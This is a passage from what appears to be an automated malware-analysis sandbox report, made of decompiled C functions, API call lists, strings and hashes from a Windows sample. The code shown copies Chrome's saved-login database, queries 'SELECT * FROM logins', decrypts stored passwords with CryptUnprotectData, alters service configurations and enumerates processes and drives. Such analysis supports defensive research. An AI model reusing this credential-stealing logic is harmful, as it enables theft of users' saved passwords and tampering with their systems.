                                      									_t78 =  &_v28;
                                      									 *_t78 = _v28 & 0x00000000;
                                      									__eflags =  *_t78;
                                      								}
                                      								__eflags = E00402E52( &_v16);
                                      								if(__eflags > 0) {
                                      									E004031FD( &_v96, E00402E63( &_v16, __eflags,  &_v32));
                                      									E004058FB(_v32);
                                      									_t85 =  &_v32;
                                      									 *_t85 = _v32 & 0x00000000;
                                      									__eflags =  *_t85;
                                      								}
                                      								__eflags = _t191;
                                      								if(_t191 != 0) {
                                      									E004031FD( &_v92, E00402E63(E00402CF2( &_v68,  &_v56), __eflags,  &_v36));
                                      									E004058FB(_v36);
                                      									_t93 =  &_v36;
                                      									 *_t93 = _v36 & 0x00000000;
                                      									__eflags =  *_t93;
                                      									E004058FB(_v56);
                                      								}
                                      								_t268 = _t268 - 0x10;
                                      								_v88 = _t264;
                                      								E00401ED8(_t268,  &_v100);
                                      								E00401F0E(_t263);
                                      								E0040138F( &_v100);
                                      								goto L24;
                                      							} else {
                                      								__eflags = _t191;
                                      								if(_t191 == 0) {
                                      									L24:
                                      									E004058FB(_v60);
                                      									E004058FB(_v24);
                                      									E004058FB(_v16);
                                      									E00402DFF( &_v68);
                                      									_t135 =  *((intOrPtr*)(_t263 + 0x3c))(_v8);
                                      									continue;
                                      								}
                                      								goto L17;
                                      							}
                                      						}
                                      						 *((intOrPtr*)(_t263 + 0x58))(_v8);
                                      						 *((intOrPtr*)(_t263 + 0x2c))();
                                      						E004033F3(_t268,  &_v12);
                                      						E0040DA33(_v40);
                                      						L5:
                                      						E004058FB(_v20);
                                      						E004058FB(_v12);
                                      						E004058FB(_v44);
                                      						return _t264;
                                      					}
                                      					L3:
                                      					E004033F3(_t268,  &_v12);
                                      					E0040DA33(_t208);
                                      					goto L4;
                                      				}
                                      			}
















































                                      0x0040adbb
                                      0x0040adc4
                                      0x0040adce
                                      0x0040add5
                                      0x0040add9
                                      0x0040ade6
                                      0x0040aded
                                      0x0040adfa
                                      0x0040ae02
                                      0x0040ae0f
                                      0x0040ae16
                                      0x0040ae1a
                                      0x0040ae27
                                      0x0040ae37
                                      0x0040ae93
                                      0x0040ae93
                                      0x00000000
                                      0x0040ae4b
                                      0x0040ae52
                                      0x0040ae5e
                                      0x0040ae6d
                                      0x0040ae70
                                      0x0040ae73
                                      0x0040ae78
                                      0x0040ae7f
                                      0x0040aec2
                                      0x0040aec5
                                      0x0040aec8
                                      0x0040aeca
                                      0x00000000
                                      0x00000000
                                      0x0040aecf
                                      0x0040aed4
                                      0x0040b0c6
                                      0x0040b0c7
                                      0x0040b0ca
                                      0x00000000
                                      0x00000000
                                      0x0040aeda
                                      0x0040aede
                                      0x0040aee2
                                      0x0040aee5
                                      0x0040aeee
                                      0x0040aefa
                                      0x0040af0c
                                      0x0040af16
                                      0x0040af1b
                                      0x0040af1d
                                      0x0040af36
                                      0x0040af3e
                                      0x0040af3e
                                      0x0040af48
                                      0x0040af4d
                                      0x0040af4f
                                      0x0040af68
                                      0x0040af70
                                      0x0040af70
                                      0x0040af7a
                                      0x0040af7f
                                      0x0040af81
                                      0x0040af88
                                      0x0040af90
                                      0x0040af93
                                      0x0040af96
                                      0x0040af99
                                      0x0040afa7
                                      0x0040afab
                                      0x0040afb1
                                      0x0040afb3
                                      0x0040afbe
                                      0x0040afc6
                                      0x0040afcc
                                      0x0040afcc
                                      0x0040afb3
                                      0x0040afd2
                                      0x0040afd7
                                      0x0040afd9
                                      0x0040afe3
                                      0x0040afe8
                                      0x0040afeb
                                      0x0040afee
                                      0x0040aff6
                                      0x0040aff8
                                      0x0040b00a
                                      0x0040b012
                                      0x0040b017
                                      0x0040b017
                                      0x0040b017
                                      0x0040b017
                                      0x0040b023
                                      0x0040b025
                                      0x0040b037
                                      0x0040b03f
                                      0x0040b044
                                      0x0040b044
                                      0x0040b044
                                      0x0040b044
                                      0x0040b048
                                      0x0040b04a
                                      0x0040b067
                                      0x0040b06f
                                      0x0040b077
                                      0x0040b077
                                      0x0040b077
                                      0x0040b07b
                                      0x0040b07b
                                      0x0040b080
                                      0x0040b083
                                      0x0040b08c
                                      0x0040b093
                                      0x0040b09b
                                      0x00000000
                                      0x0040afdb
                                      0x0040afdb
                                      0x0040afdd
                                      0x0040b0a0
                                      0x0040b0a3
                                      0x0040b0ab
                                      0x0040b0b3
                                      0x0040b0bb
                                      0x0040b0c3
                                      0x00000000
                                      0x0040b0c3
                                      0x00000000
                                      0x0040afdd
                                      0x0040afd9
                                      0x0040b0d3
                                      0x0040b0d9
                                      0x0040b0e3
                                      0x0040b0e8
                                      0x0040ae95
                                      0x0040ae98
                                      0x0040aea0
                                      0x0040aea8
                                      0x0040aeb3
                                      0x0040aeb3
                                      0x0040ae81
                                      0x0040ae88
                                      0x0040ae8d
                                      0x00000000
                                      0x0040ae92

                                      APIs
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
                                        • Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE
                                        • Part of subcall function 0040D51C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040D54D
                                        • Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      • PathFileExistsW.SHLWAPI(?), ref: 0040AE2F
                                      • CopyFileW.KERNEL32 ref: 0040AE41
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,004049AA,?), ref: 00403347
                                        • Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00403372
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AFAB
                                      • LocalFree.KERNEL32(?,?,?), ref: 0040AFC6
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 0040DA33: DeleteFileW.KERNEL32(?,?,?,00402995), ref: 0040DA3A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$ByteCharFreeMultiPathWidelstrlen$CopyCryptDataDeleteExistsFolderLocalSpecialUnprotectVirtuallstrcat
                                      • String ID: .tmp$SELECT * FROM logins$\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 1985407002-2809225024
                                      • Opcode ID: cedff8242738c2fd903e970e1aa82305de2d890a98dd9e63a787c111a7fb51a0
                                      • Instruction ID: 2ea2c2b35a31d67df08eb375238b82d3640468ae8524dd67abbef01722a5ad02
                                      • Opcode Fuzzy Hash: cedff8242738c2fd903e970e1aa82305de2d890a98dd9e63a787c111a7fb51a0
                                      • Instruction Fuzzy Hash: ACA13C32900209ABDB05EBA1DD56AEEBB79FF08315F10413EF402B61E1EF785A15DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040B5E1(short** _a4, int _a8) {
                                      				void* _t3;
                                      				short* _t9;
                                      				void* _t12;
                                      				short* _t14;
                                      				void* _t16;
                                      
                                      				_t14 = 0;
                                      				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t16 = _t3;
                                      				if(_t16 != 0) {
                                      					_t12 = OpenServiceW(_t16,  *_a4, 2);
                                      					if(_t12 != 0) {
                                      						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
                                      							_t14 = 1;
                                      						}
                                      						CloseServiceHandle(_t16);
                                      						CloseServiceHandle(_t12);
                                      						_t9 = _t14;
                                      					} else {
                                      						CloseServiceHandle(_t16);
                                      						_t9 = 0;
                                      					}
                                      					return _t9;
                                      				}
                                      				return _t3;
                                      			}








                                      0x0040b5ed
                                      0x0040b5f0
                                      0x0040b5f6
                                      0x0040b5fa
                                      0x0040b60b
                                      0x0040b60f
                                      0x0040b633
                                      0x0040b637
                                      0x0040b637
                                      0x0040b63f
                                      0x0040b642
                                      0x0040b644
                                      0x0040b611
                                      0x0040b612
                                      0x0040b618
                                      0x0040b618
                                      0x00000000
                                      0x0040b646
                                      0x0040b64a

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040B5F0
                                      • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040B605
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B612
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040B62B
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B63F
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B642
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID: ServicesActive
                                      • API String ID: 493672254-3071072050
                                      • Opcode ID: 01572796ecdb44aff4ad89a34928dabba4fab4e822c40fd02998138206f5992f
                                      • Instruction ID: eee316b07326a5f2b866cb1d03247ed7dbe559b9ae32600452f4591403dade88
                                      • Opcode Fuzzy Hash: 01572796ecdb44aff4ad89a34928dabba4fab4e822c40fd02998138206f5992f
                                      • Instruction Fuzzy Hash: 3EF0C23120422577D6211B269C48E9B3F5DEBCA7707108732FA21E62D0CBB58811C7FD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E0040E80F(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				intOrPtr _v32;
                                      				int _v36;
                                      				intOrPtr _v40;
                                      				int _v44;
                                      				char _v568;
                                      				long _v596;
                                      				char _v600;
                                      				void* _v604;
                                      				char _v1644;
                                      				intOrPtr _t49;
                                      				int _t54;
                                      				int _t58;
                                      				int _t74;
                                      				int _t78;
                                      				int _t90;
                                      				void* _t92;
                                      				void* _t113;
                                      				void* _t114;
                                      				void* _t116;
                                      				void* _t118;
                                      				signed int _t120;
                                      				void* _t121;
                                      				signed int _t123;
                                      				void* _t124;
                                      				intOrPtr* _t125;
                                      				void* _t126;
                                      
                                      				_t126 = __eflags;
                                      				_t113 = __edx;
                                      				_t92 = __ecx;
                                      				E00401052( &_v600, 0, 0x228);
                                      				_t125 = _t124 + 0xc;
                                      				_v604 = 0x22c;
                                      				_v36 = 0;
                                      				_t49 = 5;
                                      				_v32 = _t49;
                                      				_v40 = _t49;
                                      				E00401683( &_v44, _t126);
                                      				_t114 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t114 == 0xffffffff) {
                                      					L14:
                                      					E004012BA(_t92, __eflags,  &_v44);
                                      					_t54 = _v44;
                                      					__eflags = _t54;
                                      					if(_t54 != 0) {
                                      						_t120 =  *(_t54 - 4);
                                      						_t116 = _t120 * 0xc + _t54;
                                      						__eflags = _t120;
                                      						if(_t120 != 0) {
                                      							do {
                                      								_t116 = _t116 - 0xc;
                                      								E004013B6(_t116);
                                      								_t120 = _t120 - 1;
                                      								__eflags = _t120;
                                      							} while (_t120 != 0);
                                      						}
                                      					}
                                      				} else {
                                      					_push( &_v604);
                                      					_t58 = Process32FirstW(_t114);
                                      					_t128 = _t58;
                                      					if(_t58 != 0) {
                                      						do {
                                      							_v16 = _v596;
                                      							_v12 = 0;
                                      							_v8 = 0;
                                      							E004030C5( &_v12, _t113,  &_v568);
                                      							_t121 = OpenProcess(0x1000, 0, _v596);
                                      							__eflags = _t121 - 0xffffffff;
                                      							if(_t121 == 0xffffffff) {
                                      								E004031FD( &_v8, E004033AB( &_v28, "-"));
                                      								E004058FB(_v28);
                                      								_t34 =  &_v28;
                                      								 *_t34 = _v28 & 0x00000000;
                                      								__eflags =  *_t34;
                                      							} else {
                                      								E00401052( &_v1644, 0, 0x410);
                                      								_t125 = _t125 + 0xc;
                                      								_t78 =  &_v1644;
                                      								__imp__GetModuleFileNameExW(_t121, 0, _t78, 0x208);
                                      								__eflags = _t78;
                                      								if(_t78 == 0) {
                                      									E004031FD( &_v8, E004033AB( &_v24, "-"));
                                      									E004058FB(_v24);
                                      									_t29 =  &_v24;
                                      									 *_t29 = _v24 & 0x00000000;
                                      									__eflags =  *_t29;
                                      								} else {
                                      									E004031FD( &_v8, E004033AB( &_v20,  &_v1644));
                                      									E004058FB(_v20);
                                      									_v20 = _v20 & 0x00000000;
                                      								}
                                      								CloseHandle(_t121);
                                      							}
                                      							_t125 = _t125 - 0xc;
                                      							_t122 = _t125;
                                      							 *_t125 = _v16;
                                      							E004033F3(_t122 + 4,  &_v12);
                                      							E004033F3(_t122 + 8,  &_v8);
                                      							E00401560( &_v44);
                                      							E004013B6( &_v16);
                                      							_t74 = Process32NextW(_t114,  &_v604);
                                      							_push(0);
                                      							_pop(0);
                                      							__eflags = _t74;
                                      						} while (__eflags != 0);
                                      						CloseHandle(_t114);
                                      						goto L14;
                                      					} else {
                                      						CloseHandle(_t114);
                                      						E004012BA(_t92, _t128,  &_v44);
                                      						_t90 = _v44;
                                      						if(_t90 != 0) {
                                      							_t123 =  *(_t90 - 4);
                                      							_t118 = _t123 * 0xc + _t90;
                                      							if(_t123 != 0) {
                                      								do {
                                      									_t118 = _t118 - 0xc;
                                      									E004013B6(_t118);
                                      									_t123 = _t123 - 1;
                                      								} while (_t123 != 0);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t92;
                                      			}



































                                      0x0040e80f
                                      0x0040e80f
                                      0x0040e82a
                                      0x0040e82c
                                      0x0040e831
                                      0x0040e834
                                      0x0040e841
                                      0x0040e846
                                      0x0040e847
                                      0x0040e84a
                                      0x0040e84d
                                      0x0040e85b
                                      0x0040e860
                                      0x0040e9e8
                                      0x0040e9ee
                                      0x0040e9f3
                                      0x0040e9f6
                                      0x0040e9f8
                                      0x0040e9fa
                                      0x0040ea00
                                      0x0040ea02
                                      0x0040ea04
                                      0x0040ea06
                                      0x0040ea06
                                      0x0040ea0b
                                      0x0040ea10
                                      0x0040ea10
                                      0x0040ea10
                                      0x0040ea06
                                      0x0040ea04
                                      0x0040e866
                                      0x0040e86c
                                      0x0040e86e
                                      0x0040e874
                                      0x0040e876
                                      0x0040e8b9
                                      0x0040e8c2
                                      0x0040e8cc
                                      0x0040e8cf
                                      0x0040e8d2
                                      0x0040e8e9
                                      0x0040e8eb
                                      0x0040e8ee
                                      0x0040e985
                                      0x0040e98d
                                      0x0040e992
                                      0x0040e992
                                      0x0040e992
                                      0x0040e8f4
                                      0x0040e902
                                      0x0040e907
                                      0x0040e90a
                                      0x0040e919
                                      0x0040e91f
                                      0x0040e921
                                      0x0040e95a
                                      0x0040e962
                                      0x0040e967
                                      0x0040e967
                                      0x0040e967
                                      0x0040e923
                                      0x0040e936
                                      0x0040e93e
                                      0x0040e943
                                      0x0040e943
                                      0x0040e96c
                                      0x0040e96c
                                      0x0040e999
                                      0x0040e99c
                                      0x0040e99e
                                      0x0040e9a7
                                      0x0040e9b3
                                      0x0040e9bb
                                      0x0040e9c3
                                      0x0040e9d0
                                      0x0040e9d6
                                      0x0040e9d8
                                      0x0040e9d9
                                      0x0040e9d9
                                      0x0040e9e2
                                      0x00000000
                                      0x0040e878
                                      0x0040e879
                                      0x0040e885
                                      0x0040e88a
                                      0x0040e88f
                                      0x0040e895
                                      0x0040e89b
                                      0x0040e89f
                                      0x0040e8a5
                                      0x0040e8a5
                                      0x0040e8aa
                                      0x0040e8af
                                      0x0040e8af
                                      0x0040e8b4
                                      0x0040e89f
                                      0x0040e88f
                                      0x0040e876
                                      0x0040ea1b

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E855
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E86E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E879
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      • OpenProcess.KERNEL32(00001000,00000000,?,?), ref: 0040E8E3
                                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0040E919
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E96C
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E9D0
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E9E2
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                      • String ID:
                                      • API String ID: 3514491001-0
                                      • Opcode ID: eeb2d8d736913b17ae9c4b89f93247d5dffb713e1eafd525665515e51b53e459
                                      • Instruction ID: d6a070f34a12a1d34ccb490787e25848055c2920b169500faa4818559f6cf036
                                      • Opcode Fuzzy Hash: eeb2d8d736913b17ae9c4b89f93247d5dffb713e1eafd525665515e51b53e459
                                      • Instruction Fuzzy Hash: 8751B272E00118ABCB10EBA5DD8AEEEBB78AF84315F00057AE505B31D0DB785B548B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040F7CD(void* __ecx, void* __eflags) {
                                      				char _v264;
                                      				intOrPtr _v292;
                                      				void* _v300;
                                      				int _t11;
                                      				void* _t22;
                                      
                                      				_t22 = CreateToolhelp32Snapshot(2, 0);
                                      				E00401052( &_v300, 0, 0x128);
                                      				_v300 = 0x128;
                                      				_t11 = Process32First(_t22,  &_v300);
                                      				while(_t11 != 0) {
                                      					if(E004010E6( &_v264, "explorer.exe") == 0) {
                                      						return _v292;
                                      					}
                                      					_t11 = Process32Next(_t22,  &_v300);
                                      				}
                                      				CloseHandle(_t22);
                                      				return 0;
                                      			}








                                      0x0040f7e7
                                      0x0040f7f3
                                      0x0040f7fb
                                      0x0040f809
                                      0x0040f836
                                      0x0040f826
                                      0x00000000
                                      0x0040f847
                                      0x0040f830
                                      0x0040f830
                                      0x0040f83b
                                      0x00000000

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F7DC
                                      • Process32First.KERNEL32(00000000,?), ref: 0040F809
                                      • Process32Next.KERNEL32(00000000,?), ref: 0040F830
                                      • CloseHandle.KERNEL32(00000000), ref: 0040F83B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID: explorer.exe
                                      • API String ID: 420147892-3187896405
                                      • Opcode ID: 8d17e075dee9889557f4d992a22cfadbe3ba1e4f6a297f731f5af46e549355d6
                                      • Instruction ID: 2b204fbf3d2e274149eb59f35319977f58e1319f1570237e8f092e315a6edf2e
                                      • Opcode Fuzzy Hash: 8d17e075dee9889557f4d992a22cfadbe3ba1e4f6a297f731f5af46e549355d6
                                      • Instruction Fuzzy Hash: EC01D672901124BBDB30A760AC49FDA37BCDB45310F004076FA05F11C0EB78DA948A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E0040DB53(char __ecx, void* __eflags) {
                                      				void* _v8;
                                      				char _v12;
                                      				intOrPtr _v16;
                                      				int _v20;
                                      				WCHAR* _v24;
                                      				intOrPtr _v28;
                                      				signed int _v32;
                                      				intOrPtr _v36;
                                      				char _v40;
                                      				WCHAR* _t33;
                                      				intOrPtr _t34;
                                      				int _t44;
                                      				WCHAR* _t54;
                                      				signed int _t72;
                                      				char _t74;
                                      				int _t75;
                                      				long _t76;
                                      				WCHAR* _t77;
                                      				void* _t78;
                                      				void* _t79;
                                      
                                      				_t74 = __ecx;
                                      				_v12 = __ecx;
                                      				_t33 = E004059A9(0x208);
                                      				_v32 = _v32 & 0x00000000;
                                      				_t54 = _t33;
                                      				_t34 = 5;
                                      				_v28 = _t34;
                                      				_v36 = _t34;
                                      				E00401996( &_v40, __eflags);
                                      				_t76 = GetLogicalDriveStringsW(0x104, _t54);
                                      				_t81 = _t76 - 0x104;
                                      				if(_t76 > 0x104) {
                                      					_t72 = 2;
                                      					_t54 = E004059A9( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
                                      					GetLogicalDriveStringsW(_t76, _t54);
                                      				}
                                      				_t77 = 0;
                                      				if( *_t54 != 0) {
                                      					do {
                                      						_v24 = _t77;
                                      						E004031FD( &_v24, E004033AB( &_v8, _t54));
                                      						E004058FB(_v8);
                                      						_v8 = _t77;
                                      						_t44 = GetDriveTypeW(_v24);
                                      						_t79 = _t79 - 0xc;
                                      						_t75 = _t44;
                                      						_t78 = _t79;
                                      						_v20 = _t75;
                                      						E004033F3(_t78,  &_v24);
                                      						 *(_t78 + 4) = _t75;
                                      						 *((intOrPtr*)(_t78 + 8)) = _v16;
                                      						E004018A3( &_v40);
                                      						_t54 =  &(( &(_t54[E00403027( &_v24)]))[1]);
                                      						E004058FB(_v24);
                                      						_t77 = 0;
                                      						_v24 = 0;
                                      						_t84 =  *_t54;
                                      					} while ( *_t54 != 0);
                                      					_t30 =  &_v12; // 0x402a6b
                                      					_t74 =  *_t30;
                                      				}
                                      				E00401348(_t74, _t84,  &_v40);
                                      				_t60 = _v40;
                                      				if(_v40 != 0) {
                                      					E00401AA0(_t60, _t60);
                                      				}
                                      				return _t74;
                                      			}























                                      0x0040db5c
                                      0x0040db63
                                      0x0040db66
                                      0x0040db6b
                                      0x0040db74
                                      0x0040db76
                                      0x0040db77
                                      0x0040db7a
                                      0x0040db7d
                                      0x0040db8e
                                      0x0040db90
                                      0x0040db96
                                      0x0040db9c
                                      0x0040dbab
                                      0x0040dbaf
                                      0x0040dbaf
                                      0x0040dbb5
                                      0x0040dbba
                                      0x0040dbbc
                                      0x0040dbc0
                                      0x0040dbcc
                                      0x0040dbd4
                                      0x0040dbdc
                                      0x0040dbdf
                                      0x0040dbe5
                                      0x0040dbe8
                                      0x0040dbea
                                      0x0040dbec
                                      0x0040dbf5
                                      0x0040dc00
                                      0x0040dc03
                                      0x0040dc06
                                      0x0040dc19
                                      0x0040dc1c
                                      0x0040dc21
                                      0x0040dc23
                                      0x0040dc26
                                      0x0040dc26
                                      0x0040dc2b
                                      0x0040dc2b
                                      0x0040dc2b
                                      0x0040dc34
                                      0x0040dc39
                                      0x0040dc3e
                                      0x0040dc41
                                      0x0040dc41
                                      0x0040dc4c

                                      APIs
                                        • Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
                                        • Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3
                                      • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0040DB88
                                      • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0040DBAF
                                      • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 0040DBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                      • String ID: k*@
                                      • API String ID: 2408535517-2725539947
                                      • Opcode ID: 25bde1fc645dd23c9f61706139190765254cfcef7ea2d7fa198aa439140ef896
                                      • Instruction ID: 98d02b3701341341695fb94b7a0308b04c6fe68b2b5b36501cba12d719c14525
                                      • Opcode Fuzzy Hash: 25bde1fc645dd23c9f61706139190765254cfcef7ea2d7fa198aa439140ef896
                                      • Instruction Fuzzy Hash: DD318F71E002199BCB14EFE5C9869EFBBB8EF48355F10407EE502B7291DA785E04CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 24%
                                      			E00409150(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				char _v8216;
                                      				char* _t24;
                                      				signed int _t27;
                                      				WCHAR* _t29;
                                      				intOrPtr _t30;
                                      				signed int* _t31;
                                      				intOrPtr _t32;
                                      				void* _t34;
                                      				intOrPtr _t35;
                                      				intOrPtr _t36;
                                      				void* _t38;
                                      				void* _t39;
                                      
                                      				_t30 = __ecx;
                                      				E00401130(0x2014, __ecx);
                                      				_t36 = _a4;
                                      				_t29 = __edx;
                                      				_v8 = _t30;
                                      				_t3 = _t36 - 1; // -1
                                      				_t34 = GlobalAlloc(0x40, _t3);
                                      				_t38 = 1;
                                      				if(_t36 > 1) {
                                      					_t32 = _v8;
                                      					do {
                                      						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
                                      						_t38 = _t38 + 1;
                                      					} while (_t38 < _t36);
                                      				}
                                      				_t8 = _t36 - 1; // -1
                                      				_v12 = _t34;
                                      				_v16 = _t8;
                                      				_t39 = 0;
                                      				_t24 =  &_v16;
                                      				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
                                      				if(_t24 == 0) {
                                      					_push(L"Could not decrypt");
                                      				} else {
                                      					if(_t36 > 0) {
                                      						_t35 = _v20;
                                      						_t31 =  &_v8216;
                                      						do {
                                      							_t27 =  *(_t35 + _t39) & 0x000000ff;
                                      							_t39 = _t39 + 2;
                                      							 *_t31 = _t27;
                                      							_t31 =  &(_t31[0]);
                                      						} while (_t39 < _t36);
                                      					}
                                      					_push( &_v8216);
                                      				}
                                      				return lstrcpyW(_t29, ??);
                                      			}




















                                      0x00409150
                                      0x00409158
                                      0x00409160
                                      0x00409163
                                      0x00409165
                                      0x00409168
                                      0x00409176
                                      0x00409178
                                      0x0040917b
                                      0x0040917d
                                      0x00409180
                                      0x00409183
                                      0x00409187
                                      0x00409188
                                      0x00409180
                                      0x0040918c
                                      0x0040918f
                                      0x00409192
                                      0x00409195
                                      0x004091a0
                                      0x004091a4
                                      0x004091ac
                                      0x004091d5
                                      0x004091ae
                                      0x004091b0
                                      0x004091b2
                                      0x004091b5
                                      0x004091bb
                                      0x004091bb
                                      0x004091bf
                                      0x004091c2
                                      0x004091c5
                                      0x004091c8
                                      0x004091bb
                                      0x004091d2
                                      0x004091d2
                                      0x004091e5

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,-00000001,756645FD,?,?,?,00409104,00001000,?,00000000,00001000), ref: 0040916E
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409104), ref: 004091A4
                                      • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 004091DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                      • String ID: Could not decrypt
                                      • API String ID: 3112367126-1484008118
                                      • Opcode ID: fc0f622c9fb2ff7c4ec637993297f3bc9bb7a08dc3c8dd8d8f8921ad52fb0c66
                                      • Instruction ID: 1abc3db474fe3b319ddae7689be19c513d00d763e18794f27d19184647c918fc
                                      • Opcode Fuzzy Hash: fc0f622c9fb2ff7c4ec637993297f3bc9bb7a08dc3c8dd8d8f8921ad52fb0c66
                                      • Instruction Fuzzy Hash: 8C110672A0021AABD711CB98C9449DEF7BCEF88700B10417AEA45F7292E2749E01CBB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
